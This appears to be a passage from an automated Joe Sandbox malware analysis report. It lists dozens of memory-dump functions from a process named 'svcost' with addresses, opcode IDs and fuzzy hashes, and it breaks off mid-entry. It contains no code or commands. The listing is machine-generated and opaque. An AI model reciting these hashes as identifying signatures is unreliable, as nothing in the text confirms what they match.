                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ec9e80696b35f40953bd44d28ecb9b37b7c5a8e040e650cff97bfdb660b90a96
                                                                                            • Instruction ID: 1551749b3de0b84562aabef243e62a827610b3ccdfb9f9d5801159eec0f78653
                                                                                            • Opcode Fuzzy Hash: ec9e80696b35f40953bd44d28ecb9b37b7c5a8e040e650cff97bfdb660b90a96
                                                                                            • Instruction Fuzzy Hash: B9E0C974E05208EFCB44DFA9D550A9DBBB5EB49304F10C1AADC1893350D6319A52DF85
                                                                                            Function 05415C30 Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ec9e80696b35f40953bd44d28ecb9b37b7c5a8e040e650cff97bfdb660b90a96
                                                                                            • Instruction ID: a65abaa4b2268f0cead24e0782712fa065f1010178148eba567023305f7b13c5
                                                                                            • Opcode Fuzzy Hash: ec9e80696b35f40953bd44d28ecb9b37b7c5a8e040e650cff97bfdb660b90a96
                                                                                            • Instruction Fuzzy Hash: A6E03974E05208EFCB44DFA8C550ADDBBF5EB88300F10C0AA9C1893300D6319A42CF40
                                                                                            Function 0069A070 Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 861ef41d644bf280404ecae79e3c9183c1a4b278fd8afe395d3ff54eb74ef7c6
                                                                                            • Instruction ID: d5451c229242447f435723c296b0c5ddccdf3cc82db92343a62604412b215b23
                                                                                            • Opcode Fuzzy Hash: 861ef41d644bf280404ecae79e3c9183c1a4b278fd8afe395d3ff54eb74ef7c6
                                                                                            • Instruction Fuzzy Hash: 1EE0E539905208EBCF05DFD4D950EADBBBAFB49304F108199EC0527761C7329A62EF96
                                                                                            Function 0069C8F0 Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5ff89a22ce81d3524b048594cc1fbc41495997213b1c932b27cacc30920eddc3
                                                                                            • Instruction ID: 5f6a557228e27a8a5192640420c2bb4b9d5263d9844e698e7370b85e43cc2677
                                                                                            • Opcode Fuzzy Hash: 5ff89a22ce81d3524b048594cc1fbc41495997213b1c932b27cacc30920eddc3
                                                                                            • Instruction Fuzzy Hash: A5F0393480420CEFCB04CF94D910AACBBB9EB49310F10C0A9EC1852350C6329A62EF80
                                                                                            Function 00699F99 Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 88cfe5367c107a0e0444e0d3ed83d19376386965d7f996a0955f95ab91fa6539
                                                                                            • Instruction ID: ad64dd53bfb28003bd1278ce64fdf29bcd478d82726a87931520c6080482ce72
                                                                                            • Opcode Fuzzy Hash: 88cfe5367c107a0e0444e0d3ed83d19376386965d7f996a0955f95ab91fa6539
                                                                                            • Instruction Fuzzy Hash: 7DF06D38905208AFCB04DFA8D560BBCFBB8EB49305F18C0EDD85857752DA319A42CF51
                                                                                            Function 023ADB48 Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f234154bc9e6de7f2611305feb962d71b97bafad28a360b4c1924240f30ba36e
                                                                                            • Instruction ID: f0a66e4c5ab15ea8d961b818e72e290e5bc2f398b1fbbf1774381858043ae93b
                                                                                            • Opcode Fuzzy Hash: f234154bc9e6de7f2611305feb962d71b97bafad28a360b4c1924240f30ba36e
                                                                                            • Instruction Fuzzy Hash: 02E0CD313013149BE7246674483176A33D9DF85751F104075DA059F7C0DE71D801CF61
                                                                                            Function 023A80CC Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: def8b5938f169a121f128059a5d94126ee09085bf61141bba21386755274fd23
                                                                                            • Instruction ID: 490962ce4e8b73322411cad5a8180f7690171a23aa05b7b262fb12b6c0eb8135
                                                                                            • Opcode Fuzzy Hash: def8b5938f169a121f128059a5d94126ee09085bf61141bba21386755274fd23
                                                                                            • Instruction Fuzzy Hash: A9F0AF74909208CFDB18DF69D8A8A9CFBF2FF49310F1481AAD009A7255E7349982CF04
                                                                                            Function 023AD690 Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e83e4eecbfc3714b0bdcb07e4dd3912601f9f0da37936df795f9e3920e9b1040
                                                                                            • Instruction ID: 58f24489f9322b17c1a99a9ced3b6074dba84be168b0dcd04ab3cc9a18dcd301
                                                                                            • Opcode Fuzzy Hash: e83e4eecbfc3714b0bdcb07e4dd3912601f9f0da37936df795f9e3920e9b1040
                                                                                            • Instruction Fuzzy Hash: 57E09A6155E7C15FD7079B308C654447F74BD5320079A82EFD898CF0ABD7686858C363
                                                                                            Function 02112BC0 Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 38b1e4e43c895d8e0ee25da1853e177a8f68b18b3f603848a6972d98ba60d859
                                                                                            • Instruction ID: 4f84d196b5318eedcb9d5e65e9c6fca7f1bb2e8b470c48641581e4276e01e397
                                                                                            • Opcode Fuzzy Hash: 38b1e4e43c895d8e0ee25da1853e177a8f68b18b3f603848a6972d98ba60d859
                                                                                            • Instruction Fuzzy Hash: B4E0263494D2889FC304CBA4DC20A79BFA8DB47304F2481EDC8198B262C7324D02CF01
                                                                                            Function 02118DA8 Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fe164051b5d3b0f306e7e661c7bed131044ef216b28469753910c8a6dbf463a7
                                                                                            • Instruction ID: 43578ca72e251c2c8aeea3ae8a3e95c543370f67ee8838489732b44127122cea
                                                                                            • Opcode Fuzzy Hash: fe164051b5d3b0f306e7e661c7bed131044ef216b28469753910c8a6dbf463a7
                                                                                            • Instruction Fuzzy Hash: 73E06570D01308EFCB04DFA8C400A9DBBB8EB48300F00C0BAD804A2340D7369A40CF81
                                                                                            Function 0541FF68 Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d225cc6799801dde5a56fe151b4b48cf06c019e269523df717a442373f179846
                                                                                            • Instruction ID: 5833c54f0f17931cebef65fbae14d0966b60784b43de0a6139655ba56aec7791
                                                                                            • Opcode Fuzzy Hash: d225cc6799801dde5a56fe151b4b48cf06c019e269523df717a442373f179846
                                                                                            • Instruction Fuzzy Hash: C8E0E574E05208EFCB44DFA8D550AADBBF4EB49304F10C1EAD81893340D7319A46CF81
                                                                                            Function 002F081F Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 569735aeea76f13e11dc55d566a4d0891712cd6f4ebda084596fd4f760f335c5
                                                                                            • Instruction ID: 52ae6169a46abe5d66248e697685d2cf9023edd0e8ccca18b8b7992bcec29523
                                                                                            • Opcode Fuzzy Hash: 569735aeea76f13e11dc55d566a4d0891712cd6f4ebda084596fd4f760f335c5
                                                                                            • Instruction Fuzzy Hash: 91E04FB690E7C15FCF0AAF746DAA2843F71AF5321AB5E04DEC440CE063E559860E8756
                                                                                            Function 006964C8 Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0211e591d99b313ddab6d9e092930173e8667bbc71e19cb2929240eb7e5ae3ff
                                                                                            • Instruction ID: cc2fe078bb07f49b722427fc2e3b7e3dd1a01d9c5269840c3834fd1fc67404e0
                                                                                            • Opcode Fuzzy Hash: 0211e591d99b313ddab6d9e092930173e8667bbc71e19cb2929240eb7e5ae3ff
                                                                                            • Instruction Fuzzy Hash: 44E092308092849FCB45CBA4C560AECBFB5EB07209F1481EED84497652C6325A06DB01
                                                                                            Function 023A5FA0 Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1e0b6979b76af097917202a2dcd8f091441e1c4fdbb38cd69d1c58fdea639216
                                                                                            • Instruction ID: 25e6c57c6a3e7453ac0d44a58cd0d0020a6277f94ddd789bff7cb2adae15bdb2
                                                                                            • Opcode Fuzzy Hash: 1e0b6979b76af097917202a2dcd8f091441e1c4fdbb38cd69d1c58fdea639216
                                                                                            • Instruction Fuzzy Hash: F8E01A74D05308EFCB44DFA8D514A9DBBB9EB49304F50C1BAD814A3350D7359A51DF81
                                                                                            Function 023A77C0 Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2614ea0c8e489f3507e05dfe0c16e1e6a4683e415fc72675824fa45411e792da
                                                                                            • Instruction ID: 27728ccedc9182f197191437a22ed3e099de5fa55b1782815707471b8bc35cc7
                                                                                            • Opcode Fuzzy Hash: 2614ea0c8e489f3507e05dfe0c16e1e6a4683e415fc72675824fa45411e792da
                                                                                            • Instruction Fuzzy Hash: EDE0E574E05208EFCB44DFA8D5A0AACFBF8EB49304F10C1A98818A3341D7329A42CF41
                                                                                            Function 023A8C30 Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2614ea0c8e489f3507e05dfe0c16e1e6a4683e415fc72675824fa45411e792da
                                                                                            • Instruction ID: adad8bf9a3be0887d7b2e9ae1f1f5194d24cbffddd8c96134562b2302a45b6ee
                                                                                            • Opcode Fuzzy Hash: 2614ea0c8e489f3507e05dfe0c16e1e6a4683e415fc72675824fa45411e792da
                                                                                            • Instruction Fuzzy Hash: DDE0E574E06208EFCB48DFA8D565AACFBF8EB49304F10C1A9881893341D7319A42CF41
                                                                                            Function 0211B938 Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853e1fd78a7dc9d880e5cbf837ae00b6c2bbfe46b27b8e58b4dacae8a26ef869
                                                                                            • Instruction ID: 9cf47943aa35784a8799cd948820a29332831271e85cea93b012b269c95bd0bf
                                                                                            • Opcode Fuzzy Hash: 853e1fd78a7dc9d880e5cbf837ae00b6c2bbfe46b27b8e58b4dacae8a26ef869
                                                                                            • Instruction Fuzzy Hash: DDE0E574949208ABCB04DF94D550AACBBB8EB49308F10C1AAD85453351D7329A52DF81
                                                                                            Function 0211F551 Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f8699865c2b6e2c41bd4fa6e62cb0886acc5b0c81500a6271d34169bcbe6843e
                                                                                            • Instruction ID: cfc0b9665309ebcdd06d7ae26f9e51549de24a1edcdf809c3fbe404b56d194dc
                                                                                            • Opcode Fuzzy Hash: f8699865c2b6e2c41bd4fa6e62cb0886acc5b0c81500a6271d34169bcbe6843e
                                                                                            • Instruction Fuzzy Hash: 05E02B3070CB924FC7628B39A8141463FF24BC9100308837FD48ACBA1ADE65EC074742
                                                                                            Function 0541FED8 Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aa35dcdc3d15c1fd8c8b6a208905108999a94345e991c6cf2680db0426815f28
                                                                                            • Instruction ID: 53a2bae958350b576553655cdc4ba18ed1ebe6189191b0b7df0b87444758d631
                                                                                            • Opcode Fuzzy Hash: aa35dcdc3d15c1fd8c8b6a208905108999a94345e991c6cf2680db0426815f28
                                                                                            • Instruction Fuzzy Hash: 98E08674909308EBC704DF94D9519ADBF78EB46305F20D1EADC4457341CB319A47DBA9
                                                                                            Function 023A6228 Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4298ef88ed7e20137a884ede3488166aba5e9f94adf7bed1f34c9e3915c24e6a
                                                                                            • Instruction ID: 4c6e3f2779af2dae45bef798dbea9a7cc44883d0a9946c1ac63ebd956e811ef1
                                                                                            • Opcode Fuzzy Hash: 4298ef88ed7e20137a884ede3488166aba5e9f94adf7bed1f34c9e3915c24e6a
                                                                                            • Instruction Fuzzy Hash: A9E04F38905208EFCB44DF94D959DADBBB8FF0A315F1081A8E84427321C7319A90DF41
                                                                                            Function 023A73DD Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bf76d950b3787d9ddc0e164f4e22212892bfb1440c2f819f6908fcd9e3f4c3d0
                                                                                            • Instruction ID: 299f14b91bfdd3eae4f75a7b3e15f7a1f865d633f8d4bd1fda936daba02f2ddb
                                                                                            • Opcode Fuzzy Hash: bf76d950b3787d9ddc0e164f4e22212892bfb1440c2f819f6908fcd9e3f4c3d0
                                                                                            • Instruction Fuzzy Hash: 68E01A74945248DFCB44DFA8C9A0A9CFFB4EB09244F2081ADCC0997351D6328A46CF41
                                                                                            Function 023A5CC0 Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3afe0a94cd1a74094bc6bb56aed51d66fdc9c09426c8ae137ac8f3485254e007
                                                                                            • Instruction ID: 92c2ae5628305f4fee954dd3f8e5af2d67a1822eab5eb7bbfcb2490085228efc
                                                                                            • Opcode Fuzzy Hash: 3afe0a94cd1a74094bc6bb56aed51d66fdc9c09426c8ae137ac8f3485254e007
                                                                                            • Instruction Fuzzy Hash: 0FE0E570D05208EBCB44DFA9951069DBBB8FB45208F1081B98818A2300E7359A40CF81
                                                                                            Function 02116810 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 602c25cae5c30a3e4a85deebb37c284dca4597d5be430eb88405513343149e41
                                                                                            • Instruction ID: 2a9e542702bc92ae08ac385abb104d2f21ba226d5a1f95eb04b3e10ed3684b1c
                                                                                            • Opcode Fuzzy Hash: 602c25cae5c30a3e4a85deebb37c284dca4597d5be430eb88405513343149e41
                                                                                            • Instruction Fuzzy Hash: ADE04678905208EBCB08DF94D950DADBF78EB4A318F1081B9DC0423350CB329A52DF81
                                                                                            Function 0211D1A8 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e8608ee4432d722b62b271ca3b98ffc4cf392c8e816d02715f62613172011706
                                                                                            • Instruction ID: 0bcee9feb21a962d7e0ec2f613522f461c49267826bd2ede7d386c75603b0e00
                                                                                            • Opcode Fuzzy Hash: e8608ee4432d722b62b271ca3b98ffc4cf392c8e816d02715f62613172011706
                                                                                            • Instruction Fuzzy Hash: 97E04674C46208EFCB18DFA4E550AADBFB9AB49301F1081BAD85412350CB305A50DF81
                                                                                            Function 0541FB08 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a1a7646a9feccf53c5ece99c1150bc28dd1467202c9589a1d6e99f08b68fff88
                                                                                            • Instruction ID: a88c09acb4e442d09d960614cf84edec2a176d3fcd066f2cdf3468583c1a3f80
                                                                                            • Opcode Fuzzy Hash: a1a7646a9feccf53c5ece99c1150bc28dd1467202c9589a1d6e99f08b68fff88
                                                                                            • Instruction Fuzzy Hash: 11E01A34D05208ABC704DF94D6646ACBBB8EB89204F1081EACC1953351CA31AA46CF55
                                                                                            Function 05418818 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a1a7646a9feccf53c5ece99c1150bc28dd1467202c9589a1d6e99f08b68fff88
                                                                                            • Instruction ID: 36648d3d90d8ef6d332f175ff3fd3b3b5eee2556f01787dba97e079454403616
                                                                                            • Opcode Fuzzy Hash: a1a7646a9feccf53c5ece99c1150bc28dd1467202c9589a1d6e99f08b68fff88
                                                                                            • Instruction Fuzzy Hash: 96E01A34D05208EBC704DF94D6506ACBBB8EB49205F1081EADC5853341CB319A42CF45
                                                                                            Function 0069D938 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 156d564de15281c09a5ae36b98e87b4cbf59476151624602b4d7f2c3a0bef336
                                                                                            • Instruction ID: c5a7463f05853c427ffb00f09df365ca00feabfffda1c34db4f6ef5186194b56
                                                                                            • Opcode Fuzzy Hash: 156d564de15281c09a5ae36b98e87b4cbf59476151624602b4d7f2c3a0bef336
                                                                                            • Instruction Fuzzy Hash: B3E0BF74905209DFCB44EFA8D555BACBBF9EB49305F2081B98C08D3751D6319A46DB41
                                                                                            Function 0069F188 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a381fef0915500744a4a88eda8cc58034c9c68cb0d46db729fa6683dba63bd9b
                                                                                            • Instruction ID: ad69ce17e69102047b5afdfaaf9b60f51b7959f7a84b8e0de730d18f6f583949
                                                                                            • Opcode Fuzzy Hash: a381fef0915500744a4a88eda8cc58034c9c68cb0d46db729fa6683dba63bd9b
                                                                                            • Instruction Fuzzy Hash: 64E08C38909208EBDB04DF94DA509ADBBBAEB46314F20C1A9DC0463350CB329E56DB81
                                                                                            Function 0069D3C0 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 156d564de15281c09a5ae36b98e87b4cbf59476151624602b4d7f2c3a0bef336
                                                                                            • Instruction ID: 71e2cad26ae3af4e705fbdb734a07b223f18113bf614d324e43db95417e13905
                                                                                            • Opcode Fuzzy Hash: 156d564de15281c09a5ae36b98e87b4cbf59476151624602b4d7f2c3a0bef336
                                                                                            • Instruction Fuzzy Hash: 65E0BF74915208DFCB44DFA8D55569CBBF9EB49305F2081A9C80893751D6719E42CF41
                                                                                            Function 00699FA8 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cd29695e6ba37e2ff2895c4c8e18adef94375cf0ef99eb24b729a8a9d25aec70
                                                                                            • Instruction ID: cd7f7fb4b1955d7d3155a3401a7c80a21ee264a3c4250a0ab00de514a031f5fc
                                                                                            • Opcode Fuzzy Hash: cd29695e6ba37e2ff2895c4c8e18adef94375cf0ef99eb24b729a8a9d25aec70
                                                                                            • Instruction Fuzzy Hash: 07E01A34D05208ABCB04DF98D5506ACFBB9EB49305F10C1EDD81893741DA319A42DF51
                                                                                            Function 0069D790 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 156d564de15281c09a5ae36b98e87b4cbf59476151624602b4d7f2c3a0bef336
                                                                                            • Instruction ID: 73de67b81de5da0bb9b04f7b606598e75d72a1f71426b3fbbb15fb21919decc3
                                                                                            • Opcode Fuzzy Hash: 156d564de15281c09a5ae36b98e87b4cbf59476151624602b4d7f2c3a0bef336
